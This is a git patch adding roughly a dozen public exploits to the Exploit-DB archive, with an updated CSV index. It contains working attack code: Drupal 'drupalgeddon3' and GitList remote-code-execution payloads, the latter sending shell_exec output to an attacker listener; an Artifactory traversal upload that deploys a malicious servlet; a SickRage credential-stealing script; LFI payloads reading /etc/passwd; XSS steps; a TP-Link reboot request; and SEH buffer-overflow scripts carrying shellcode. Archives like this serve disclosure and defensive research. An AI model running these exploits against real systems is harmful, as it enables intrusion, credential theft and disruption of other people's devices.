From b1f00227f1f9307de1b3651cb5314029aa713f14 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 27 Apr 2018 05:01:49 +0000 Subject: [PATCH] DB: 2018-04-27 12 changes to exploits/shellcodes Free Download Manager 2.0 Built 417 - Local Buffer Overflow (SEH) Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH) Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow Shopy Point of Sale v1.0 - CSV Injection Shopy Point of Sale 1.0 - CSV Injection Drupal < 7.58 - 'drupalgeddon3' Authenticated Remote Code Execution (PoC) Blog Master Pro v1.0 - CSV Injection HRSALE The Ultimate HRM v1.0.2 - CSV Injection HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection Blog Master Pro 1.0 - CSV Injection HRSALE The Ultimate HRM 1.0.2 - CSV Injection HRSALE The Ultimate HRM 1.0.2 - 'award_id' SQL Injection HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion HRSALE The Ultimate HRM 1.0.2 - Local File Inclusion Jfrog Artifactory < 4.16 - Unauthenticated Arbitrary File Upload / Remote Command Execution WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response October CMS User Plugin 1.4.5 - Persistent Cross-Site Scripting MyBB Threads to Link Plugin 1.3 - Cross-Site Scripting GitList 0.6 - Unauthenticated Remote Code Execution TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Unauthenticated Remote Reboot Frog CMS 0.9.5 - Persistent Cross-Site Scripting --- exploits/hardware/webapps/44550.txt | 22 ++++++ exploits/linux/webapps/44543.txt | 108 ++++++++++++++++++++++++++++ exploits/linux/webapps/44545.py | 99 +++++++++++++++++++++++++ exploits/php/webapps/44542.txt | 18 +++++ exploits/php/webapps/44544.php | 23 ++++++ exploits/php/webapps/44546.txt | 20 ++++++ exploits/php/webapps/44547.txt | 31 ++++++++ exploits/php/webapps/44548.py | 100 ++++++++++++++++++++++++++ exploits/php/webapps/44551.txt | 38 ++++++++++ exploits/windows/local/44549.py | 48 +++++++++++++ exploits/windows/remote/31694.py | 2 +- exploits/windows_x86/local/44499.py | 56 +++++++++++++++ files_exploits.csv | 23 ++++-- 13 files changed, 581 insertions(+), 7 deletions(-) create mode 100644 exploits/hardware/webapps/44550.txt create mode 100644 exploits/linux/webapps/44543.txt create mode 100755 exploits/linux/webapps/44545.py create mode 100644 exploits/php/webapps/44542.txt create mode 100644 exploits/php/webapps/44544.php create mode 100644 exploits/php/webapps/44546.txt create mode 100644 exploits/php/webapps/44547.txt create mode 100755 exploits/php/webapps/44548.py create mode 100644 exploits/php/webapps/44551.txt create mode 100755 exploits/windows/local/44549.py create mode 100755 exploits/windows_x86/local/44499.py diff --git a/exploits/hardware/webapps/44550.txt b/exploits/hardware/webapps/44550.txt new file mode 100644 index 000000000..9f36e6077 --- /dev/null +++ b/exploits/hardware/webapps/44550.txt @@ -0,0 +1,22 @@ +# Exploit Title: TP-Link Technologies TL-WA850RE Wi-Fi Range Extender | Unauthorized Remote Reboot +# Date: 25/04/2018 +# Exploit Author: Wadeek +# Vendor Homepage: https://www.tp-link.com/ +# Firmware Link: https://www.tp-link.com/en/download/TL-WA850RE.html +# Category: dos + +1. www.shodan.io (with title "Opening...") + +"HTTP/1.1 200 OK" "Server: TP-LINK HTTPD/1.0" "COOKIE=" + +2. Proof of Concept + + +:System Log: +/data/systemlog.txt?operation=save + +:Encrypted Configuration File: +/data/config.bin?operation=backup + +:Reboot: +curl --silent 'http://[IP]/data/reboot.json' -H 'Host: [IP]' -H 'Accept: application/json, text/javascript, */*;' --compressed -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: COOKIE=' -H 'Connection: keep-alive' --data 'operation=write' \ No newline at end of file diff --git a/exploits/linux/webapps/44543.txt b/exploits/linux/webapps/44543.txt new file mode 100644 index 000000000..172d72b89 --- /dev/null +++ b/exploits/linux/webapps/44543.txt @@ -0,0 +1,108 @@ +# Exploit Title: Jfrog Artifactory < 4.16 - Unauthenticated Arbitrary File Upload / Remote Command Execution +# Date: 2018-04-25 +# Exploit Author: Alessio Sergi +# Vendor Homepage: https://jfrog.com/artifactory/ +# Software Link: https://bintray.com/jfrog/artifactory/download_file?file_path=jfrog-artifactory-oss-4.15.0.zip +# CVE : CVE-2016-10036 + +Jfrog Artifactory < 4.16 is vulnerable to unauthenticated arbitrary file upload and directory traversal vulnerabilities. +The vulnerabilities are within the upload api "/artifactory/ui/artifact/upload", require that "Allow Anonymous Access" is enabled (as it is on a default installation) and can be abused to create or overwrite files on the server. Specifically, it is possible to create or overwrite any files inside the application folder (scenario 1) or deploy a new application (scenario 2) and execute arbitrary code on the server. + + +Scenario 1: It is possible to modify the html files of the application just by executing an http post request like the one below, which exploits a directory traversal vulnerability on the parameter "filename" to insert the javascript code "" within the file app.html : + +****** + +POST /artifactory/ui/artifact/upload HTTP/1.1 +Host: [removed] +User-Agent: [removed] +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Length: 1749 +Content-Type: multipart/form-data; boundary=---------------------------6085305491255810029929874687 +Connection: close + +-----------------------------6085305491255810029929874687 +Content-Disposition: form-data; name="file"; filename="../../../tomcat/webapps/artifactory/webapp/app.html" +Content-Type: application/zip + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +-----------------------------6085305491255810029929874687-- + +****** + +(It is also possible to exploit this vulnerability to create JSP files within the application folder, but the tomcat used by Artifactory on a default installation won't execute them.) + + + +Scenario 2: + +It is possible to exploit the same vulnerability to deploy a malicious servlet application on the tomcat server and obtain remote code execution: + +****** + +POST /artifactory/ui/artifact/upload HTTP/1.1 +Host: [removed] +User-Agent: [removed] +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Length: 3515 +Content-Type: multipart/form-data; boundary=---------------------------6085305491255810029929874687 +Connection: close + +-----------------------------6085305491255810029929874687 +Content-Disposition: form-data; name="file"; filename="../../../tomcat/webapps/malicious-servlet.war" +Content-Type: application/zip + +PK��3[--SNIP--] +WEB-INF/lib/PK������r��> ���� + +-----------------------------6085305491255810029929874687-- + +****** \ No newline at end of file diff --git a/exploits/linux/webapps/44545.py b/exploits/linux/webapps/44545.py new file mode 100755 index 000000000..937df2fa4 --- /dev/null +++ b/exploits/linux/webapps/44545.py @@ -0,0 +1,99 @@ +# Exploit Title: SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response +# Date: 2018-04-01 +# Exploit Author: Sven Fassbender +# Vendor Homepage: https://sickrage.github.io +# Software Link: https://github.com/SickRage/SickRage +# Version: < v2018.03.09-1 +# CVE : CVE-2018-9160 +# Category: webapps + +#1. Background information + +"SickRage is an automatic Video Library Manager for TV Shows. +It watches for new episodes of your favourite shows, and when they are posted it does its magic: +automatic torrent/nzb searching, downloading, and processing at the qualities you want." --extract from https://sickrage.github.io + +#2. Vulnerability description + +SickRage returns clear-text credentials for e.g. GitHub, AniDB, Kodi, Plex etc. in HTTP responses. +Prerequisite is that the user did not set a username and password for their SickRage installation. (not enforced, default) + +HTTP request: +GET /config/general/ HTTP/1.1 +Host: 192.168.1.13:8081 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: de,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://192.168.1.13:8081/config/backuprestore/ +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 + + +HTTP response: +HTTP/1.1 200 OK +Content-Length: 113397 +Vary: Accept-Encoding +Server: TornadoServer/4.5.1 +Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37" +Date: Fri, 02 Mar 2018 10:47:51 GMT +Content-Type: text/html; charset=UTF-8 + + + + + + [...] + + [...] + + [...] + + + + +#3. Proof of Concept + +#!/usr/bin/env python +import urllib3 +import sys +import requests +from BeautifulSoup import BeautifulSoup + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) +init(autoreset=True) + +if __name__ == '__main__': + if len(sys.argv) != 3: + print "Usage: $ " + sys.argv[0] + " [IP_adress] [port]" + else: + host = sys.argv[1] + print "https://www.shodan.io/host/{0}".format(host) + port = sys.argv[2] + print "*** Get GitHub User credentials from SickRage ***" + url = "http://{0}:{1}/config/general".format(host, port) + response = requests.get(url, timeout=5) + parsed_html = BeautifulSoup(response.text) + try: + git_username = parsed_html.body.find('input', {'id': 'git_username'}).get("value") + git_password = parsed_html.body.find('input', {'id': 'git_password'}).get("value") + if str(git_password) != "None" and str(git_password) != "None": + if len(git_password) >= 1 and len(git_username) >= 1: + print str(git_username) + print str(git_password) + except AttributeError: + pass + + +#4. Timeline + +[2018-03-07] Vulnerability discovered +[2018-03-08] Vendor contacted +[2018-03-08] Vendor replied +[2018-03-09] Vulnerability fixed. (https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1) + +#5. Recommendation + +Update the SickRage installation on v2018.03.09-1 or later. +Protect the access to the web application with proper user credentials. \ No newline at end of file diff --git a/exploits/php/webapps/44542.txt b/exploits/php/webapps/44542.txt new file mode 100644 index 000000000..82f578105 --- /dev/null +++ b/exploits/php/webapps/44542.txt @@ -0,0 +1,18 @@ +This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602. + +You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm). + +POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1 +[...] +form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN] + +Retrieve the form_build_id from the response, and then triggering the exploit with : + +POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1 +[...] +form_build_id=[FORM_BUILD_ID] + +This will display the result of the whoami command. + +Patch your systems! +Blaklis \ No newline at end of file diff --git a/exploits/php/webapps/44544.php b/exploits/php/webapps/44544.php new file mode 100644 index 000000000..c2e2d7fd2 --- /dev/null +++ b/exploits/php/webapps/44544.php @@ -0,0 +1,23 @@ +# Exploit Title: WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion +# Date: 2018-04-25 +# Exploit Author: Wadeek +# Software Link: https://downloads.wordpress.org/plugin/wp-with-spritz.zip +# Software Version: 1.0 +# Google Dork: intitle:("Spritz Login Success") AND inurl:("wp-with-spritz/wp.spritz.login.success.html") +# Tested on: Apache2 with PHP 7 on Linux +# Category: webapps + + +1. Version Disclosure + +/wp-content/plugins/wp-with-spritz/readme.txt + +2. Source Code + +if(isset($_GET['url'])){ +$content=file_get_contents($_GET['url']); + +3. Proof of Concept + +/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd +/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec \ No newline at end of file diff --git a/exploits/php/webapps/44546.txt b/exploits/php/webapps/44546.txt new file mode 100644 index 000000000..a7b7aaa32 --- /dev/null +++ b/exploits/php/webapps/44546.txt @@ -0,0 +1,20 @@ +# Exploit Title: October CMS User Plugin v1.4.5 - Persistent Cross-Site Scripting +# Date: 2018-04-03 +# Author: 0xB9 +# Software Link: https://octobercms.com/plugin/rainlab-user +# Version: 1.4.5 +# Tested on: Ubuntu 17.10 +# CVE: CVE-2018-10366 + +#1. Description: +Front-end user management for October CMS. Allows visitors to create a website. + +#2. Proof of Concept: + +Persistent XSS +- Go to the account page localhost/OctoberCMS/account/ +- Register & enter the following for your full name

"> +- You will be alerted everytime you visit the account page localhost/OctoberCMS/account/ + +#3. Solution: +Update to 1.4.6 \ No newline at end of file diff --git a/exploits/php/webapps/44547.txt b/exploits/php/webapps/44547.txt new file mode 100644 index 000000000..358c842da --- /dev/null +++ b/exploits/php/webapps/44547.txt @@ -0,0 +1,31 @@ +# Exploit Title: MyBB Threads to Link Plugin v1.3 - Persistent XSS +# Date: 3/15/2018 +# Author: 0xB9 +# Contact: luxorforums.com/User-0xB9 or 0xB9[at]protonmail.com +# Software Link: https://community.mybb.com/mods.php?action=view&pid=1065 +# Version: v1.3 +# Tested on: Ubuntu 17.10 +CVE: CVE-2018-10365 + + +1. Description: +When editing a thread the user is given to the option to convert the thread to a link. + + +2. Proof of Concept: + +Persistent XSS +- Edit a thread or post you've made +- At the bottom of the edit page in the Thread Link box input the following "> +- Now visit the forum your thread/post exists in to see the alert. + + +3. Solution: +The plugin has since been removed after notifying the author. + +Patch in line 83: +$thread['tlink'] = ($thread['tlink']); + +to + +$thread['tlink'] = htmlspecialchars_uni($thread['tlink']); \ No newline at end of file diff --git a/exploits/php/webapps/44548.py b/exploits/php/webapps/44548.py new file mode 100755 index 000000000..5a548373e --- /dev/null +++ b/exploits/php/webapps/44548.py @@ -0,0 +1,100 @@ +''' +# Exploit Title: GitList 0.6 Unauthenticated RCE +# Date: 25-04-2018 +# Software Link: https://github.com/klaussilveira/gitlist +# Exploit Author: Kacper Szurek +# Contact: https://twitter.com/KacperSzurek +# Website: https://security.szurek.pl/ +# Category: remote + +1. Description + +Bypass/Exploit `escapeshellarg` using argument injection: `git grep --open-files-in-pager=whoami`. + +More info about this technique: + +https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html + +2. Proof of Concept +''' + +import requests +from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer +import urlparse +import urllib +import threading +import time +import os +import re + +url = 'http://192.168.1.1/gitlist/' +command = 'id' +your_ip = '192.168.1.100' +your_port = 8001 + +print "GitList 0.6 Unauthenticated RCE" +print "by Kacper Szurek" +print "https://security.szurek.pl/" + +print "REMEMBER TO DISABLE FIREWALL" + +search_url = None +r = requests.get(url) +repos = re.findall(r'/([^/]+)/master/rss', r.text) + +if len(repos) == 0: + print "[-] No repos" + os._exit(0) + +for repo in repos: + print "[+] Found repo {}".format(repo) + r = requests.get("{}{}".format(url, repo)) + files = re.findall(r'href="[^\"]+blob/master/([^\"]+)"', r.text) + for file in files: + r = requests.get("{}{}/raw/master/{}".format(url, repo, file)) + print "[+] Found file {}".format(file) + print r.text[0:100] + search_url = "{}{}/tree/{}/search".format(url, repo, r.text[0:1]) + break + +if not search_url: + print "[-] No files in repo" + os._exit(0) + +print "[+] Search using {}".format(search_url) + +class GetHandler(BaseHTTPRequestHandler): + def do_GET(self): + parsed_path = urlparse.urlparse(self.path) + print "[+] Command response" + print urllib.unquote_plus(parsed_path.query).decode('utf8')[2:] + self.send_response(200) + self.end_headers() + self.wfile.write("OK") + os._exit(0) + + def log_message(self, format, *args): + return + +def exploit_server(): + server = HTTPServer((your_ip, your_port), GetHandler) + server.serve_forever() + +print "[+] Start server on {}:{}".format(your_ip, your_port) +t = threading.Thread(target=exploit_server) +t.daemon = True +t.start() +print "[+] Server started" + +r = requests.post(search_url, data={'query':'--open-files-in-pager=php -r "file_get_contents(\\"http://{}:{}/?a=\\".urlencode(shell_exec(\\"{}\\")));"'.format(your_ip, your_port, command)}) + +while True: + time.sleep(1) + +''' +3. Solution: + +Update to version 0.7.0 + +https://github.com/klaussilveira/gitlist/releases/tag/0.7.0 +''' \ No newline at end of file diff --git a/exploits/php/webapps/44551.txt b/exploits/php/webapps/44551.txt new file mode 100644 index 000000000..865be562e --- /dev/null +++ b/exploits/php/webapps/44551.txt @@ -0,0 +1,38 @@ +# Exploit Title: Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability via "Admin Site title" in Settings +# Date: 2018-04-23 +# Exploit Author: Wenming Jiang +# Vendor Homepage: https://github.com/philippe/FrogCMS +# Software Link: https://github.com/philippe/FrogCMS +# Version: 0.9.5 +# Tested on: php 5.6, apache2.2.29, macos 10.12.6 +# CVE :CVE-2018-10321 + + +Description: +Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability when an attacker has access to Settings page, and enters the payload via "Admin Site title" in Settings. + + +Steps to replicate: +log into the system as an administrator role; +enter page: http://your_site/frogcms/admin/?/setting, and click Settings option; +navigate to "Admin Site title" section +enter payload as shown in below section: +Frog CMS1 +visit http://your_site/frogcms/admin/?/login, you will triage JavaScript execution + + + +Exploit Code: +Frog CMS1 + + +Impacts: +Anyone who visit the target page will be affected to triage JavaScript code, including administrator, editor, developer, and guest. + + +Affected Version: +0.9.5 + + +Affected URL: +http://your_site/frogcms/admin/?/login \ No newline at end of file diff --git a/exploits/windows/local/44549.py b/exploits/windows/local/44549.py new file mode 100755 index 000000000..5dd4dd694 --- /dev/null +++ b/exploits/windows/local/44549.py @@ -0,0 +1,48 @@ +####################################################### +# Exploit Title: Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH) +# Date: 25.04.2018 +# Exploit Author:T3jv1l +# Vendor Homepage:http://www.alloksoft.com/ +# Software: www.alloksoft.com/allok_avi2dvd.exe +# Category:Local +# Contact:https://twitter.com/T3jv1l +# Version: Allok AVI to DVD SVCD VCD Converter 4.0.1217 +# Tested on: Windows 7 SP1 x86 +# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/ +############################################################# + +print""" +#1. Download and install the setup file +#2. Run this exploit code via python 2.7 +#3. A file "Evil.txt" will be created +#4. Copy the contents of the file (Evil.txt)and paste in the License Name field +#5. Click Register and BOMM !!!! """ + +import struct + + + +junk = "A" * 780 +nseh = "\x90\x90\xeb\x10" +seh = struct.pack(" Import > Import lists of downloads > open URL file that includes http://192.168.1.53:81 (HOST|Port changed according to your needs) + +#!/usr/bin/python + +from socket import * +from time import sleep + +host = "192.168.1.53" +port = 81 + +s = socket(AF_INET, SOCK_STREAM) +s.bind((host, port)) +s.listen(1) +print "\n[+] Listening on %d ..." % port + +cl, addr = s.accept() +print "[+] Connection accepted from %s" % addr[0] + +nseh = "\xeb\x88\x90\x90" #Short Jump backward 118bytes (jmp short 0xffffff8a) (more bytes can be jumped backwards depending on the shell code size required ) +seh = "\xd1\x9c\x4a\x00" #address to trigger POP-POP-RETURN sequence +# Evil produce a message box 113 bytes can be changed according to your needs +evil = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7" +payload = "\x43" * (1724-255) + "\x90" * 142 + evil + nseh + seh + +buffer = "HTTP/1.1 301 Moved Permanently\r\n" +buffer += "Date: Thu, 23 Feb 2018 10:21:08 GMT\r\n" +buffer += "Server: Apache/2.2.22 (Debian)\r\n" +buffer += "Location: "+ payload + "\r\n" +buffer += "Vary: Accept-Encoding\r\n" +buffer += "Content-Length: 8000\r\n" +buffer += "Keep-Alive: timeout=5, max=100\r\n" +buffer += "Connection: Keep-Alive\r\n" +buffer += "Content-Type: text/html; charset=iso-8859-1\r\n" +buffer += "\r\n" +buffer += "\n" +buffer += "\n" +buffer += "301 Moved Permanently\n" +buffer += "\n" +buffer += "

Moved Permanently

\n" +buffer += "

The document has moved here.

\n" +buffer += "\n" + +print cl.recv(1000) +cl.send(buffer) +print "[+] Sending buffer: OK\n" + +sleep(1) +cl.close() +s.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 915e15c9b..758fca217 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9680,9 +9680,11 @@ id,file,description,date,author,type,platform,port 44478,exploits/windows_x86/local/44478.cpp,"Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation",2018-03-26,xiaodaozhi,local,windows_x86, 44479,exploits/windows_x86/local/44479.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)",2018-03-15,xiaodaozhi,local,windows_x86, 44480,exploits/windows_x86/local/44480.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)",2018-03-01,xiaodaozhi,local,windows_x86, +44499,exploits/windows_x86/local/44499.py,"Free Download Manager 2.0 Built 417 - Local Buffer Overflow (SEH)",2018-04-23,"Marwan Shamel",local,windows_x86, 44516,exploits/windows/local/44516.py,"R 3.4.4 - Local Buffer Overflow",2018-04-24,bzyo,local,windows, 44518,exploits/windows/local/44518.py,"Allok Video to DVD Burner 2.6.1217 - Buffer Overflow (SEH)",2018-04-24,T3jv1l,local,windows, 44523,exploits/linux/local/44523.rb,"lastore-daemon D-Bus - Privilege Escalation (Metasploit)",2018-04-24,Metasploit,local,linux, +44549,exploits/windows/local/44549.py,"Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH)",2018-04-26,T3jv1l,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -14869,7 +14871,7 @@ id,file,description,date,author,type,platform,port 31639,exploits/php/remote/31639.txt,"Trillian 3.1.9 - '.DTD' File XML Parser Buffer Overflow",2008-04-11,david130490,remote,php, 31917,exploits/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution (Metasploit)",2014-02-26,Metasploit,remote,windows,9090 31689,exploits/windows/remote/31689.py,"HP Data Protector - EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",remote,windows,5555 -31694,exploits/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad ELHarmeel",remote,windows, +31694,exploits/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad Alharmeel",remote,windows, 31695,exploits/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection (Metasploit)",2014-02-16,Metasploit,remote,php, 31706,exploits/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution",2008-04-24,"Thomas Pollet",remote,unix, 31736,exploits/windows/remote/31736.py,"Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (1)",2014-02-18,Sumit,remote,windows,80 @@ -39198,7 +39200,7 @@ id,file,description,date,author,type,platform,port 44454,exploits/php/webapps/44454.txt,"Cobub Razor 0.8.0 - SQL injection",2018-04-16,Kyhvedn,webapps,php,80 44469,exploits/jsp/webapps/44469.txt,"Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference",2018-04-16,Frogy,webapps,jsp, 44471,exploits/php/webapps/44471.txt,"Joomla! Component jDownloads 3.2.58 - Cross Site Scripting",2018-04-17,"Sureshbabu Narvaneni",webapps,php, -44534,exploits/php/webapps/44534.txt,"Shopy Point of Sale v1.0 - CSV Injection",2018-04-25,8bitsec,webapps,php, +44534,exploits/php/webapps/44534.txt,"Shopy Point of Sale 1.0 - CSV Injection",2018-04-25,8bitsec,webapps,php, 44483,exploits/php/webapps/44483.txt,"MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Site Scripting",2018-04-18,"Keerati T.",webapps,php,80 44484,exploits/php/webapps/44484.txt,"Rvsitebuilder CMS - Database Backup Download",2018-04-18,"Hesam Bazvand",webapps,php, 44486,exploits/php/webapps/44486.txt,"Match Clone Script 1.0.4 - Cross-Site Scripting",2018-04-18,ManhNho,webapps,php,80 @@ -39220,9 +39222,18 @@ id,file,description,date,author,type,platform,port 44513,exploits/php/webapps/44513.py,"Interspire Email Marketer < 6.1.6 - Remote Admin Authentication Bypass",2018-04-24,devcoinfet,webapps,php, 44515,exploits/php/webapps/44515.py,"Ericsson-LG iPECS NMS A.1Ac - Cleartext Credential Disclosure",2018-04-24,"Berk Cem Göksel",webapps,php, 44520,exploits/php/webapps/44520.html,"WordPress Plugin Woo Import Export 1.0 - Arbitrary File Deletion",2018-04-24,"Lenon Leite",webapps,php,80 +44542,exploits/php/webapps/44542.txt,"Drupal < 7.58 - 'drupalgeddon3' Authenticated Remote Code Execution (PoC)",2018-04-25,Blaklis,webapps,php, 44531,exploits/java/webapps/44531.txt,"WSO2 Carbon / WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting",2018-04-24,"SEC Consult",webapps,java, -44535,exploits/php/webapps/44535.txt,"Blog Master Pro v1.0 - CSV Injection",2018-04-25,8bitsec,webapps,php, -44536,exploits/php/webapps/44536.txt,"HRSALE The Ultimate HRM v1.0.2 - CSV Injection",2018-04-25,8bitsec,webapps,php, -44537,exploits/php/webapps/44537.txt,"HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection",2018-04-25,8bitsec,webapps,php, +44535,exploits/php/webapps/44535.txt,"Blog Master Pro 1.0 - CSV Injection",2018-04-25,8bitsec,webapps,php, +44536,exploits/php/webapps/44536.txt,"HRSALE The Ultimate HRM 1.0.2 - CSV Injection",2018-04-25,8bitsec,webapps,php, +44537,exploits/php/webapps/44537.txt,"HRSALE The Ultimate HRM 1.0.2 - 'award_id' SQL Injection",2018-04-25,8bitsec,webapps,php, 44538,exploits/php/webapps/44538.txt,"HRSALE The Ultimate HRM 1.0.2 - Authenticated Cross-Site Scripting",2018-04-25,8bitsec,webapps,php, -44539,exploits/php/webapps/44539.txt,"HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion",2018-04-25,8bitsec,webapps,php, +44539,exploits/php/webapps/44539.txt,"HRSALE The Ultimate HRM 1.0.2 - Local File Inclusion",2018-04-25,8bitsec,webapps,php, +44543,exploits/linux/webapps/44543.txt,"Jfrog Artifactory < 4.16 - Unauthenticated Arbitrary File Upload / Remote Command Execution",2018-04-26,"Alessio Sergi",webapps,linux, +44544,exploits/php/webapps/44544.php,"WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion",2018-04-26,Wadeek,webapps,php, +44545,exploits/linux/webapps/44545.py,"SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response",2018-04-26,"Sven Fassbender",webapps,linux, +44546,exploits/php/webapps/44546.txt,"October CMS User Plugin 1.4.5 - Persistent Cross-Site Scripting",2018-04-26,0xB9,webapps,php, +44547,exploits/php/webapps/44547.txt,"MyBB Threads to Link Plugin 1.3 - Cross-Site Scripting",2018-04-26,0xB9,webapps,php,80 +44548,exploits/php/webapps/44548.py,"GitList 0.6 - Unauthenticated Remote Code Execution",2018-04-26,"Kacper Szurek",webapps,php, +44550,exploits/hardware/webapps/44550.txt,"TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Unauthenticated Remote Reboot",2018-04-26,Wadeek,webapps,hardware, +44551,exploits/php/webapps/44551.txt,"Frog CMS 0.9.5 - Persistent Cross-Site Scripting",2018-04-26,"Wenming Jiang",webapps,php,80